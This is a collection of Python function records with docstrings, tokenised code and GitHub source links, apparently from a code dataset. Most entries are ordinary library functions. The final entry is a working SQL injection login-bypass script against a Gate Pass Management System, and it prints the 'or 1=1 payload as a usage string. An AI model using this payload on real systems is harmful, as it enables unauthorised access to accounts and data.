[ "def", "electron_range", "(", "element", ",", "beam_energy", ",", "density", "=", "'auto'", ",", "tilt", "=", "0", ")", ":", "if", "density", "==", "'auto'", ":", "density", "=", "elements_db", "[", "element", "]", "[", "'Physical_properties'", "]", "[", "'density (g/cm^3)'", "]", "Z", "=", "elements_db", "[", "element", "]", "[", "'General_properties'", "]", "[", "'Z'", "]", "A", "=", "elements_db", "[", "element", "]", "[", "'General_properties'", "]", "[", "'atomic_weight'", "]", "# Note: magic numbers here are from Kanaya-Okayama parameterization. See", "# docstring for associated references.", "return", "(", "0.0276", "*", "A", "/", "np", ".", "power", "(", "Z", ",", "0.89", ")", "/", "density", "*", "np", ".", "power", "(", "beam_energy", ",", "1.67", ")", "*", "math", ".", "cos", "(", "math", ".", "radians", "(", "tilt", ")", ")", ")" ]
https://github.com/hyperspy/hyperspy/blob/1ffb3fab33e607045a37f30c1463350b72617e10/hyperspy/misc/eds/utils.py#L210-L253
simonw/sqlite-utils
e0c476bc380744680c8b7675c24fb0e9f5ec6dcd
sqlite_utils/db.py
python
Database.execute
( self, sql: str, parameters: Optional[Union[Iterable, dict]] = None )
Execute SQL query and return a ``sqlite3.Cursor``.
Execute SQL query and return a ``sqlite3.Cursor``.
[ "Execute", "SQL", "query", "and", "return", "a", "sqlite3", ".", "Cursor", "." ]
def execute( self, sql: str, parameters: Optional[Union[Iterable, dict]] = None ) -> sqlite3.Cursor: "Execute SQL query and return a ``sqlite3.Cursor``." if self._tracer: self._tracer(sql, parameters) if parameters is not None: return self.conn.execute(sql, parameters) else: return self.conn.execute(sql)
[ "def", "execute", "(", "self", ",", "sql", ":", "str", ",", "parameters", ":", "Optional", "[", "Union", "[", "Iterable", ",", "dict", "]", "]", "=", "None", ")", "->", "sqlite3", ".", "Cursor", ":", "if", "self", ".", "_tracer", ":", "self", ".", "_tracer", "(", "sql", ",", "parameters", ")", "if", "parameters", "is", "not", "None", ":", "return", "self", ".", "conn", ".", "execute", "(", "sql", ",", "parameters", ")", "else", ":", "return", "self", ".", "conn", ".", "execute", "(", "sql", ")" ]
https://github.com/simonw/sqlite-utils/blob/e0c476bc380744680c8b7675c24fb0e9f5ec6dcd/sqlite_utils/db.py#L417-L426
leo-editor/leo-editor
383d6776d135ef17d73d935a2f0ecb3ac0e99494
leo/plugins/obsolete/tkGui.py
python
tkinterGui.get_focus
(self,c)
Returns the widget that has focus, or body if None.
Returns the widget that has focus, or body if None.
[ "Returns", "the", "widget", "that", "has", "focus", "or", "body", "if", "None", "." ]
def get_focus(self,c): """Returns the widget that has focus, or body if None.""" try: return c.frame.top.focus_displayof() except Exception: if g.unitTesting: g.es_exception() return None
[ "def", "get_focus", "(", "self", ",", "c", ")", ":", "try", ":", "return", "c", ".", "frame", ".", "top", ".", "focus_displayof", "(", ")", "except", "Exception", ":", "if", "g", ".", "unitTesting", ":", "g", ".", "es_exception", "(", ")", "return", "None" ]
https://github.com/leo-editor/leo-editor/blob/383d6776d135ef17d73d935a2f0ecb3ac0e99494/leo/plugins/obsolete/tkGui.py#L500-L509
seantis/seantis-questionnaire
698c77b3d707635f50bcd86e7f1c94e94061b0f5
questionnaire/templatetags/questionnaire.py
python
dictget
(thedict, key)
return thedict.get(key, None)
{{ dictionary|dictget:variableholdingkey }}
{{ dictionary|dictget:variableholdingkey }}
[ "{{", "dictionary|dictget", ":", "variableholdingkey", "}}" ]
def dictget(thedict, key): "{{ dictionary|dictget:variableholdingkey }}" return thedict.get(key, None)
[ "def", "dictget", "(", "thedict", ",", "key", ")", ":", "return", "thedict", ".", "get", "(", "key", ",", "None", ")" ]
https://github.com/seantis/seantis-questionnaire/blob/698c77b3d707635f50bcd86e7f1c94e94061b0f5/questionnaire/templatetags/questionnaire.py#L9-L11
scikit-hep/root_numpy
b062fefe5ee8164aea6c90d7d4435890a87dc112
docs/sphinxext/numpydoc/compiler_unparse.py
python
UnparseCompilerAst._From
(self, t)
Handle "from xyz import foo, bar as baz".
Handle "from xyz import foo, bar as baz".
[ "Handle", "from", "xyz", "import", "foo", "bar", "as", "baz", "." ]
def _From(self, t): """ Handle "from xyz import foo, bar as baz". """ # fixme: Are From and ImportFrom handled differently? self._fill("from ") self._write(t.modname) self._write(" import ") for i, (name,asname) in enumerate(t.names): if i != 0: self._write(", ") self._write(name) if asname is not None: self._write(" as "+asname)
[ "def", "_From", "(", "self", ",", "t", ")", ":", "# fixme: Are From and ImportFrom handled differently?", "self", ".", "_fill", "(", "\"from \"", ")", "self", ".", "_write", "(", "t", ".", "modname", ")", "self", ".", "_write", "(", "\" import \"", ")", "for", "i", ",", "(", "name", ",", "asname", ")", "in", "enumerate", "(", "t", ".", "names", ")", ":", "if", "i", "!=", "0", ":", "self", ".", "_write", "(", "\", \"", ")", "self", ".", "_write", "(", "name", ")", "if", "asname", "is", "not", "None", ":", "self", ".", "_write", "(", "\" as \"", "+", "asname", ")" ]
https://github.com/scikit-hep/root_numpy/blob/b062fefe5ee8164aea6c90d7d4435890a87dc112/docs/sphinxext/numpydoc/compiler_unparse.py#L244-L256
codelv/enaml-native
04c3a015bcd649f374c5ecd98fcddba5e4fbdbdc
src/enamlnative/core/eventloop/gen.py
python
multi_future
(children, quiet_exceptions=())
return future
Wait for multiple asynchronous futures in parallel. This function is similar to `multi`, but does not support `YieldPoints <YieldPoint>`. .. versionadded:: 4.0 .. versionchanged:: 4.2 If multiple ``Futures`` fail, any exceptions after the first (which is raised) will be logged. Added the ``quiet_exceptions`` argument to suppress this logging for selected exception types. .. deprecated:: 4.3 Use `multi` instead.
Wait for multiple asynchronous futures in parallel.
[ "Wait", "for", "multiple", "asynchronous", "futures", "in", "parallel", "." ]
def multi_future(children, quiet_exceptions=()): """Wait for multiple asynchronous futures in parallel. This function is similar to `multi`, but does not support `YieldPoints <YieldPoint>`. .. versionadded:: 4.0 .. versionchanged:: 4.2 If multiple ``Futures`` fail, any exceptions after the first (which is raised) will be logged. Added the ``quiet_exceptions`` argument to suppress this logging for selected exception types. .. deprecated:: 4.3 Use `multi` instead. """ if isinstance(children, dict): keys = list(children.keys()) children = children.values() else: keys = None children = list(map(convert_yielded, children)) assert all(is_future(i) for i in children) unfinished_children = set(children) future = Future() if not children: future.set_result({} if keys is not None else []) def callback(f): unfinished_children.remove(f) if not unfinished_children: result_list = [] for f in children: try: result_list.append(f.result()) except Exception as e: if future.done(): if not isinstance(e, quiet_exceptions): app_log.error("Multiple exceptions in yield list", exc_info=True) else: future.set_exc_info(sys.exc_info()) if not future.done(): if keys is not None: future.set_result(dict(zip(keys, result_list))) else: future.set_result(result_list) listening = set() for f in children: if f not in listening: listening.add(f) f.add_done_callback(callback) return future
[ "def", "multi_future", "(", "children", ",", "quiet_exceptions", "=", "(", ")", ")", ":", "if", "isinstance", "(", "children", ",", "dict", ")", ":", "keys", "=", "list", "(", "children", ".", "keys", "(", ")", ")", "children", "=", "children", ".", "values", "(", ")", "else", ":", "keys", "=", "None", "children", "=", "list", "(", "map", "(", "convert_yielded", ",", "children", ")", ")", "assert", "all", "(", "is_future", "(", "i", ")", "for", "i", "in", "children", ")", "unfinished_children", "=", "set", "(", "children", ")", "future", "=", "Future", "(", ")", "if", "not", "children", ":", "future", ".", "set_result", "(", "{", "}", "if", "keys", "is", "not", "None", "else", "[", "]", ")", "def", "callback", "(", "f", ")", ":", "unfinished_children", ".", "remove", "(", "f", ")", "if", "not", "unfinished_children", ":", "result_list", "=", "[", "]", "for", "f", "in", "children", ":", "try", ":", "result_list", ".", "append", "(", "f", ".", "result", "(", ")", ")", "except", "Exception", "as", "e", ":", "if", "future", ".", "done", "(", ")", ":", "if", "not", "isinstance", "(", "e", ",", "quiet_exceptions", ")", ":", "app_log", ".", "error", "(", "\"Multiple exceptions in yield list\"", ",", "exc_info", "=", "True", ")", "else", ":", "future", ".", "set_exc_info", "(", "sys", ".", "exc_info", "(", ")", ")", "if", "not", "future", ".", "done", "(", ")", ":", "if", "keys", "is", "not", "None", ":", "future", ".", "set_result", "(", "dict", "(", "zip", "(", "keys", ",", "result_list", ")", ")", ")", "else", ":", "future", ".", "set_result", "(", "result_list", ")", "listening", "=", "set", "(", ")", "for", "f", "in", "children", ":", "if", "f", "not", "in", "listening", ":", "listening", ".", "add", "(", "f", ")", "f", ".", "add_done_callback", "(", "callback", ")", "return", "future" ]
https://github.com/codelv/enaml-native/blob/04c3a015bcd649f374c5ecd98fcddba5e4fbdbdc/src/enamlnative/core/eventloop/gen.py#L818-L872
deanishe/alfred-stackexchange
b2047b76165900d55f0c7d18fd7c40131bee94ed
src/workflow/workflow.py
python
Workflow.logfile
(self)
return self.cachefile('%s.log' % self.bundleid)
Path to logfile. :returns: path to logfile within workflow's cache directory :rtype: ``unicode``
Path to logfile.
[ "Path", "to", "logfile", "." ]
def logfile(self): """Path to logfile. :returns: path to logfile within workflow's cache directory :rtype: ``unicode`` """ return self.cachefile('%s.log' % self.bundleid)
[ "def", "logfile", "(", "self", ")", ":", "return", "self", ".", "cachefile", "(", "'%s.log'", "%", "self", ".", "bundleid", ")" ]
https://github.com/deanishe/alfred-stackexchange/blob/b2047b76165900d55f0c7d18fd7c40131bee94ed/src/workflow/workflow.py#L1372-L1379
tendenci/tendenci
0f2c348cc0e7d41bc56f50b00ce05544b083bf1d
tendenci/apps/events/models.py
python
Registration.make_acct_entries
(self, user, inv, amount, **kwargs)
Make the accounting entries for the event sale
Make the accounting entries for the event sale
[ "Make", "the", "accounting", "entries", "for", "the", "event", "sale" ]
def make_acct_entries(self, user, inv, amount, **kwargs): """ Make the accounting entries for the event sale """ from tendenci.apps.accountings.models import Acct, AcctEntry, AcctTran from tendenci.apps.accountings.utils import make_acct_entries_initial, make_acct_entries_closing ae = AcctEntry.objects.create_acct_entry(user, 'invoice', inv.id) if not inv.is_tendered: make_acct_entries_initial(user, ae, amount) else: # payment has now been received make_acct_entries_closing(user, ae, amount) # #CREDIT event SALES acct_number = self.get_acct_number() acct = Acct.objects.get(account_number=acct_number) AcctTran.objects.create_acct_tran(user, ae, acct, amount*(-1))
[ "def", "make_acct_entries", "(", "self", ",", "user", ",", "inv", ",", "amount", ",", "*", "*", "kwargs", ")", ":", "from", "tendenci", ".", "apps", ".", "accountings", ".", "models", "import", "Acct", ",", "AcctEntry", ",", "AcctTran", "from", "tendenci", ".", "apps", ".", "accountings", ".", "utils", "import", "make_acct_entries_initial", ",", "make_acct_entries_closing", "ae", "=", "AcctEntry", ".", "objects", ".", "create_acct_entry", "(", "user", ",", "'invoice'", ",", "inv", ".", "id", ")", "if", "not", "inv", ".", "is_tendered", ":", "make_acct_entries_initial", "(", "user", ",", "ae", ",", "amount", ")", "else", ":", "# payment has now been received", "make_acct_entries_closing", "(", "user", ",", "ae", ",", "amount", ")", "# #CREDIT event SALES", "acct_number", "=", "self", ".", "get_acct_number", "(", ")", "acct", "=", "Acct", ".", "objects", ".", "get", "(", "account_number", "=", "acct_number", ")", "AcctTran", ".", "objects", ".", "create_acct_tran", "(", "user", ",", "ae", ",", "acct", ",", "amount", "*", "(", "-", "1", ")", ")" ]
https://github.com/tendenci/tendenci/blob/0f2c348cc0e7d41bc56f50b00ce05544b083bf1d/tendenci/apps/events/models.py#L573-L590
p5py/p5
4ef1580b26179f1973c1669751da4522c5823f17
p5/pmath/rand.py
python
noise_detail
(octaves=4, falloff=0.5)
Adjust the level of noise detail produced by noise(). :param octaves: The number of octaves to compute the noise for (defaults to 4). :type octaves: int :param falloff: :type falloff: float :note: For :code:`falloff` values greater than 0.5, :code:`noise()` will return values greater than 1.0.
Adjust the level of noise detail produced by noise().
[ "Adjust", "the", "level", "of", "noise", "detail", "produced", "by", "noise", "()", "." ]
def noise_detail(octaves=4, falloff=0.5): """Adjust the level of noise detail produced by noise(). :param octaves: The number of octaves to compute the noise for (defaults to 4). :type octaves: int :param falloff: :type falloff: float :note: For :code:`falloff` values greater than 0.5, :code:`noise()` will return values greater than 1.0. """ global PERLIN_OCTAVES global PERLIN_FALLOFF if octaves > 0: PERLIN_OCTAVES = octaves PERLIN_FALLOFF = constrain(falloff, 0, 1)
[ "def", "noise_detail", "(", "octaves", "=", "4", ",", "falloff", "=", "0.5", ")", ":", "global", "PERLIN_OCTAVES", "global", "PERLIN_FALLOFF", "if", "octaves", ">", "0", ":", "PERLIN_OCTAVES", "=", "octaves", "PERLIN_FALLOFF", "=", "constrain", "(", "falloff", ",", "0", ",", "1", ")" ]
https://github.com/p5py/p5/blob/4ef1580b26179f1973c1669751da4522c5823f17/p5/pmath/rand.py#L175-L194
frescobaldi/frescobaldi
301cc977fc4ba7caa3df9e4bf905212ad5d06912
frescobaldi_app/preferences/extensions.py
python
Config.saveSettings
(self)
Ask all extension configuration widgets to save their settings. Configuration widgets are required to implement save_settings().
Ask all extension configuration widgets to save their settings. Configuration widgets are required to implement save_settings().
[ "Ask", "all", "extension", "configuration", "widgets", "to", "save", "their", "settings", ".", "Configuration", "widgets", "are", "required", "to", "implement", "save_settings", "()", "." ]
def saveSettings(self): """Ask all extension configuration widgets to save their settings. Configuration widgets are required to implement save_settings().""" for widget in self._widgets.values(): if widget: widget.save_settings()
[ "def", "saveSettings", "(", "self", ")", ":", "for", "widget", "in", "self", ".", "_widgets", ".", "values", "(", ")", ":", "if", "widget", ":", "widget", ".", "save_settings", "(", ")" ]
https://github.com/frescobaldi/frescobaldi/blob/301cc977fc4ba7caa3df9e4bf905212ad5d06912/frescobaldi_app/preferences/extensions.py#L335-L340
mozilla/treeherder
228750c5774cfbe7d395e10e2c84665d9122496d
treeherder/model/models.py
python
ClassifiedFailure.replace_with
(self, other)
Replace this instance with the given other. Deletes stale Match objects and updates related TextLogErrorMetadatas' best_classifications to point to the given other.
Replace this instance with the given other.
[ "Replace", "this", "instance", "with", "the", "given", "other", "." ]
def replace_with(self, other): """ Replace this instance with the given other. Deletes stale Match objects and updates related TextLogErrorMetadatas' best_classifications to point to the given other. """ match_ids_to_delete = list(self.update_matches(other)) TextLogErrorMatch.objects.filter(id__in=match_ids_to_delete).delete() # Update best classifications self.best_for_errors.update(best_classification=other) self.delete()
[ "def", "replace_with", "(", "self", ",", "other", ")", ":", "match_ids_to_delete", "=", "list", "(", "self", ".", "update_matches", "(", "other", ")", ")", "TextLogErrorMatch", ".", "objects", ".", "filter", "(", "id__in", "=", "match_ids_to_delete", ")", ".", "delete", "(", ")", "# Update best classifications", "self", ".", "best_for_errors", ".", "update", "(", "best_classification", "=", "other", ")", "self", ".", "delete", "(", ")" ]
https://github.com/mozilla/treeherder/blob/228750c5774cfbe7d395e10e2c84665d9122496d/treeherder/model/models.py#L1176-L1189
eBay/accelerator
218d9a5e4451ac72b9e65df6c5b32e37d25136c8
accelerator/dsutil.py
python
ReadJson.__init__
(self, *a, **kw)
[]
def __init__(self, *a, **kw): if PY3: self.fh = _dsutil.ReadUnicode(*a, **kw) else: self.fh = _dsutil.ReadBytes(*a, **kw) self.decode = JSONDecoder().decode
[ "def", "__init__", "(", "self", ",", "*", "a", ",", "*", "*", "kw", ")", ":", "if", "PY3", ":", "self", ".", "fh", "=", "_dsutil", ".", "ReadUnicode", "(", "*", "a", ",", "*", "*", "kw", ")", "else", ":", "self", ".", "fh", "=", "_dsutil", ".", "ReadBytes", "(", "*", "a", ",", "*", "*", "kw", ")", "self", ".", "decode", "=", "JSONDecoder", "(", ")", ".", "decode" ]
https://github.com/eBay/accelerator/blob/218d9a5e4451ac72b9e65df6c5b32e37d25136c8/accelerator/dsutil.py#L117-L122
IJDykeman/wangTiles
7c1ee2095ebdf7f72bce07d94c6484915d5cae8b
experimental_code/tiles_3d/venv/lib/python2.7/site-packages/pip/_vendor/requests/models.py
python
PreparedRequest.prepare_headers
(self, headers)
Prepares the given HTTP headers.
Prepares the given HTTP headers.
[ "Prepares", "the", "given", "HTTP", "headers", "." ]
def prepare_headers(self, headers): """Prepares the given HTTP headers.""" if headers: self.headers = CaseInsensitiveDict((to_native_string(name), value) for name, value in headers.items()) else: self.headers = CaseInsensitiveDict()
[ "def", "prepare_headers", "(", "self", ",", "headers", ")", ":", "if", "headers", ":", "self", ".", "headers", "=", "CaseInsensitiveDict", "(", "(", "to_native_string", "(", "name", ")", ",", "value", ")", "for", "name", ",", "value", "in", "headers", ".", "items", "(", ")", ")", "else", ":", "self", ".", "headers", "=", "CaseInsensitiveDict", "(", ")" ]
https://github.com/IJDykeman/wangTiles/blob/7c1ee2095ebdf7f72bce07d94c6484915d5cae8b/experimental_code/tiles_3d/venv/lib/python2.7/site-packages/pip/_vendor/requests/models.py#L383-L389
securesystemslab/zippy
ff0e84ac99442c2c55fe1d285332cfd4e185e089
zippy/benchmarks/src/benchmarks/sympy/sympy/matrices/matrices.py
python
MatrixBase.is_lower_hessenberg
(self)
return all(self[i, j].is_zero for i in range(self.rows) for j in range(i + 2, self.cols))
r"""Checks if the matrix is in the lower-Hessenberg form. The lower hessenberg matrix has zero entries above the first superdiagonal. Examples ======== >>> from sympy.matrices import Matrix >>> a = Matrix([[1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]]) >>> a Matrix([ [1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]]) >>> a.is_lower_hessenberg True See Also ======== is_upper_hessenberg is_lower
r"""Checks if the matrix is in the lower-Hessenberg form.
[ "r", "Checks", "if", "the", "matrix", "is", "in", "the", "lower", "-", "Hessenberg", "form", "." ]
def is_lower_hessenberg(self): r"""Checks if the matrix is in the lower-Hessenberg form. The lower hessenberg matrix has zero entries above the first superdiagonal. Examples ======== >>> from sympy.matrices import Matrix >>> a = Matrix([[1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]]) >>> a Matrix([ [1, 2, 0, 0], [5, 2, 3, 0], [3, 4, 3, 7], [5, 6, 1, 1]]) >>> a.is_lower_hessenberg True See Also ======== is_upper_hessenberg is_lower """ return all(self[i, j].is_zero for i in range(self.rows) for j in range(i + 2, self.cols))
[ "def", "is_lower_hessenberg", "(", "self", ")", ":", "return", "all", "(", "self", "[", "i", ",", "j", "]", ".", "is_zero", "for", "i", "in", "range", "(", "self", ".", "rows", ")", "for", "j", "in", "range", "(", "i", "+", "2", ",", "self", ".", "cols", ")", ")" ]
https://github.com/securesystemslab/zippy/blob/ff0e84ac99442c2c55fe1d285332cfd4e185e089/zippy/benchmarks/src/benchmarks/sympy/sympy/matrices/matrices.py#L2161-L2189
econchick/interrogate
ad955b82c5b164a1fe900dd6928fd4bab4d9a8ac
docs/conf.py
python
read
(*parts)
Build an absolute path from *parts* and and return the contents of the resulting file. Assume UTF-8 encoding.
Build an absolute path from *parts* and and return the contents of the resulting file. Assume UTF-8 encoding.
[ "Build", "an", "absolute", "path", "from", "*", "parts", "*", "and", "and", "return", "the", "contents", "of", "the", "resulting", "file", ".", "Assume", "UTF", "-", "8", "encoding", "." ]
def read(*parts): """ Build an absolute path from *parts* and and return the contents of the resulting file. Assume UTF-8 encoding. """ here = os.path.abspath(os.path.dirname(__file__)) with codecs.open(os.path.join(here, *parts), "rb", "utf-8") as f: return f.read()
[ "def", "read", "(", "*", "parts", ")", ":", "here", "=", "os", ".", "path", ".", "abspath", "(", "os", ".", "path", ".", "dirname", "(", "__file__", ")", ")", "with", "codecs", ".", "open", "(", "os", ".", "path", ".", "join", "(", "here", ",", "*", "parts", ")", ",", "\"rb\"", ",", "\"utf-8\"", ")", "as", "f", ":", "return", "f", ".", "read", "(", ")" ]
https://github.com/econchick/interrogate/blob/ad955b82c5b164a1fe900dd6928fd4bab4d9a8ac/docs/conf.py#L6-L13
studywolf/control
4e94cb9c10543a5f5e798c0ec2605893bb21c321
studywolf_control/controllers/trace.py
python
Shell.check_pen_up
(self)
Check to see if the pen should be lifted.
Check to see if the pen should be lifted.
[ "Check", "to", "see", "if", "the", "pen", "should", "be", "lifted", "." ]
def check_pen_up(self): """Check to see if the pen should be lifted. """ if self.time >= 1. - self.tau: self.time = 0.0 return True else: return False
[ "def", "check_pen_up", "(", "self", ")", ":", "if", "self", ".", "time", ">=", "1.", "-", "self", ".", "tau", ":", "self", ".", "time", "=", "0.0", "return", "True", "else", ":", "return", "False" ]
https://github.com/studywolf/control/blob/4e94cb9c10543a5f5e798c0ec2605893bb21c321/studywolf_control/controllers/trace.py#L34-L41
soskek/bert-chainer
22cc04afff4d31b6a10e36bb32837216ede22a49
modeling.py
python
create_attention_mask_from_input_mask
(from_tensor, to_mask)
return mask
Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length].
Create 3D attention mask from a 2D tensor mask.
[ "Create", "3D", "attention", "mask", "from", "a", "2D", "tensor", "mask", "." ]
def create_attention_mask_from_input_mask(from_tensor, to_mask): """Create 3D attention mask from a 2D tensor mask. Args: from_tensor: 2D or 3D Tensor of shape [batch_size, from_seq_length, ...]. to_mask: int32 Tensor of shape [batch_size, to_seq_length]. Returns: float Tensor of shape [batch_size, from_seq_length, to_seq_length]. """ # numpy or cupy depending on GPU usage xp = chainer.cuda.get_array_module(from_tensor) from_shape = from_tensor.shape batch_size = from_shape[0] from_seq_length = from_shape[1] to_shape = to_mask.shape to_seq_length = to_shape[1] mask = xp.broadcast_to( to_mask[:, None], (batch_size, from_seq_length, to_seq_length)) return mask
[ "def", "create_attention_mask_from_input_mask", "(", "from_tensor", ",", "to_mask", ")", ":", "# numpy or cupy depending on GPU usage", "xp", "=", "chainer", ".", "cuda", ".", "get_array_module", "(", "from_tensor", ")", "from_shape", "=", "from_tensor", ".", "shape", "batch_size", "=", "from_shape", "[", "0", "]", "from_seq_length", "=", "from_shape", "[", "1", "]", "to_shape", "=", "to_mask", ".", "shape", "to_seq_length", "=", "to_shape", "[", "1", "]", "mask", "=", "xp", ".", "broadcast_to", "(", "to_mask", "[", ":", ",", "None", "]", ",", "(", "batch_size", ",", "from_seq_length", ",", "to_seq_length", ")", ")", "return", "mask" ]
https://github.com/soskek/bert-chainer/blob/22cc04afff4d31b6a10e36bb32837216ede22a49/modeling.py#L571-L594
effigies/BitTornado
03f64f2933678d08f104e340fa42b9b7d0c14993
btcopyannounce.py
python
main
(argv)
return 0
Copy announce information from source to all specified torrents
Copy announce information from source to all specified torrents
[ "Copy", "announce", "information", "from", "source", "to", "all", "specified", "torrents" ]
def main(argv): """Copy announce information from source to all specified torrents""" program, _ = os.path.splitext(os.path.basename(argv[0])) usage = "Usage: %s <source.torrent> <file1.torrent> " \ "[file2.torrent...]" % program try: opts, args = getopt.getopt(argv[1:], "hv", ("help", "verbose")) except getopt.error as msg: print(msg) return 1 if len(args) < 2: print("{}\n{}\n".format(usage, main.__doc__)) return 2 source_metainfo = MetaInfo.read(args[0]) verbose = False for opt, _ in opts: if opt in ('-h', '--help'): print("{}\n{}\n".format(usage, main.__doc__)) return 0 elif opt in ('-v', '--verbose'): verbose = True announce = source_metainfo['announce'] announce_list = source_metainfo.get('announce-list') if verbose: print('new announce: ', announce) if announce_list: print('new announce-list: ', '|'.join(','.join(tier) for tier in announce_list)) for fname in args[1:]: reannounce(fname, announce, announce_list, verbose) return 0
[ "def", "main", "(", "argv", ")", ":", "program", ",", "_", "=", "os", ".", "path", ".", "splitext", "(", "os", ".", "path", ".", "basename", "(", "argv", "[", "0", "]", ")", ")", "usage", "=", "\"Usage: %s <source.torrent> <file1.torrent> \"", "\"[file2.torrent...]\"", "%", "program", "try", ":", "opts", ",", "args", "=", "getopt", ".", "getopt", "(", "argv", "[", "1", ":", "]", ",", "\"hv\"", ",", "(", "\"help\"", ",", "\"verbose\"", ")", ")", "except", "getopt", ".", "error", "as", "msg", ":", "print", "(", "msg", ")", "return", "1", "if", "len", "(", "args", ")", "<", "2", ":", "print", "(", "\"{}\\n{}\\n\"", ".", "format", "(", "usage", ",", "main", ".", "__doc__", ")", ")", "return", "2", "source_metainfo", "=", "MetaInfo", ".", "read", "(", "args", "[", "0", "]", ")", "verbose", "=", "False", "for", "opt", ",", "_", "in", "opts", ":", "if", "opt", "in", "(", "'-h'", ",", "'--help'", ")", ":", "print", "(", "\"{}\\n{}\\n\"", ".", "format", "(", "usage", ",", "main", ".", "__doc__", ")", ")", "return", "0", "elif", "opt", "in", "(", "'-v'", ",", "'--verbose'", ")", ":", "verbose", "=", "True", "announce", "=", "source_metainfo", "[", "'announce'", "]", "announce_list", "=", "source_metainfo", ".", "get", "(", "'announce-list'", ")", "if", "verbose", ":", "print", "(", "'new announce: '", ",", "announce", ")", "if", "announce_list", ":", "print", "(", "'new announce-list: '", ",", "'|'", ".", "join", "(", "','", ".", "join", "(", "tier", ")", "for", "tier", "in", "announce_list", ")", ")", "for", "fname", "in", "args", "[", "1", ":", "]", ":", "reannounce", "(", "fname", ",", "announce", ",", "announce_list", ",", "verbose", ")", "return", "0" ]
https://github.com/effigies/BitTornado/blob/03f64f2933678d08f104e340fa42b9b7d0c14993/btcopyannounce.py#L15-L54
facebookresearch/detectron2
cb92ae1763cd7d3777c243f07749574cdaec6cb8
detectron2/export/api.py
python
Caffe2Tracer.__init__
(self, cfg: CfgNode, model: nn.Module, inputs)
Args: cfg (CfgNode): a detectron2 config used to construct caffe2-compatible model. model (nn.Module): An original pytorch model. Must be among a few official models in detectron2 that can be converted to become caffe2-compatible automatically. Weights have to be already loaded to this model. inputs: sample inputs that the given model takes for inference. Will be used to trace the model. For most models, random inputs with no detected objects will not work as they lead to wrong traces.
Args: cfg (CfgNode): a detectron2 config used to construct caffe2-compatible model. model (nn.Module): An original pytorch model. Must be among a few official models in detectron2 that can be converted to become caffe2-compatible automatically. Weights have to be already loaded to this model. inputs: sample inputs that the given model takes for inference. Will be used to trace the model. For most models, random inputs with no detected objects will not work as they lead to wrong traces.
[ "Args", ":", "cfg", "(", "CfgNode", ")", ":", "a", "detectron2", "config", "used", "to", "construct", "caffe2", "-", "compatible", "model", ".", "model", "(", "nn", ".", "Module", ")", ":", "An", "original", "pytorch", "model", ".", "Must", "be", "among", "a", "few", "official", "models", "in", "detectron2", "that", "can", "be", "converted", "to", "become", "caffe2", "-", "compatible", "automatically", ".", "Weights", "have", "to", "be", "already", "loaded", "to", "this", "model", ".", "inputs", ":", "sample", "inputs", "that", "the", "given", "model", "takes", "for", "inference", ".", "Will", "be", "used", "to", "trace", "the", "model", ".", "For", "most", "models", "random", "inputs", "with", "no", "detected", "objects", "will", "not", "work", "as", "they", "lead", "to", "wrong", "traces", "." ]
def __init__(self, cfg: CfgNode, model: nn.Module, inputs): """ Args: cfg (CfgNode): a detectron2 config used to construct caffe2-compatible model. model (nn.Module): An original pytorch model. Must be among a few official models in detectron2 that can be converted to become caffe2-compatible automatically. Weights have to be already loaded to this model. inputs: sample inputs that the given model takes for inference. Will be used to trace the model. For most models, random inputs with no detected objects will not work as they lead to wrong traces. """ assert isinstance(cfg, CfgNode), cfg assert isinstance(model, torch.nn.Module), type(model) # TODO make it support custom models, by passing in c2 model directly C2MetaArch = META_ARCH_CAFFE2_EXPORT_TYPE_MAP[cfg.MODEL.META_ARCHITECTURE] self.traceable_model = C2MetaArch(cfg, copy.deepcopy(model)) self.inputs = inputs self.traceable_inputs = self.traceable_model.get_caffe2_inputs(inputs)
[ "def", "__init__", "(", "self", ",", "cfg", ":", "CfgNode", ",", "model", ":", "nn", ".", "Module", ",", "inputs", ")", ":", "assert", "isinstance", "(", "cfg", ",", "CfgNode", ")", ",", "cfg", "assert", "isinstance", "(", "model", ",", "torch", ".", "nn", ".", "Module", ")", ",", "type", "(", "model", ")", "# TODO make it support custom models, by passing in c2 model directly", "C2MetaArch", "=", "META_ARCH_CAFFE2_EXPORT_TYPE_MAP", "[", "cfg", ".", "MODEL", ".", "META_ARCHITECTURE", "]", "self", ".", "traceable_model", "=", "C2MetaArch", "(", "cfg", ",", "copy", ".", "deepcopy", "(", "model", ")", ")", "self", ".", "inputs", "=", "inputs", "self", ".", "traceable_inputs", "=", "self", ".", "traceable_model", ".", "get_caffe2_inputs", "(", "inputs", ")" ]
https://github.com/facebookresearch/detectron2/blob/cb92ae1763cd7d3777c243f07749574cdaec6cb8/detectron2/export/api.py#L50-L68
1120362990/vulnerability-list
59a1b3f8f9c32ec2620b2953ab561b44a8e8dd95
gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py
python
attack
(URL)
[]
def attack(URL): print('[+]开始检测-Gate_Pass_Management_System_login_SQL_Injection。[+]') url = URL + '/login-exec.php' data = { #'login': 'admin','password': '123456', 'login': r"'or 1=1 or ''='", 'password': r"'or 1=1 or ''='", 'Submit': 'value', } try: r = requests.post(url,data=data) if 'Please check your username and password' in r.text: print('[-]账户密码错误,绕过登录失败,不存在漏洞。') print('检测页面:'+url) elif 'Industronics Engineering' in r.text: print('[+]绕过登录成功,存在sql注入漏洞。') print('漏洞连接:'+url) print("利用方法:login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login") else: print('[!]检测时发生错误,可能不存在漏洞页面。') except: print('[!]连接端口时发生错误。') print('[+]检测完成-Gate_Pass_Management_System_login_SQL_Injection。[+]') print('\n')
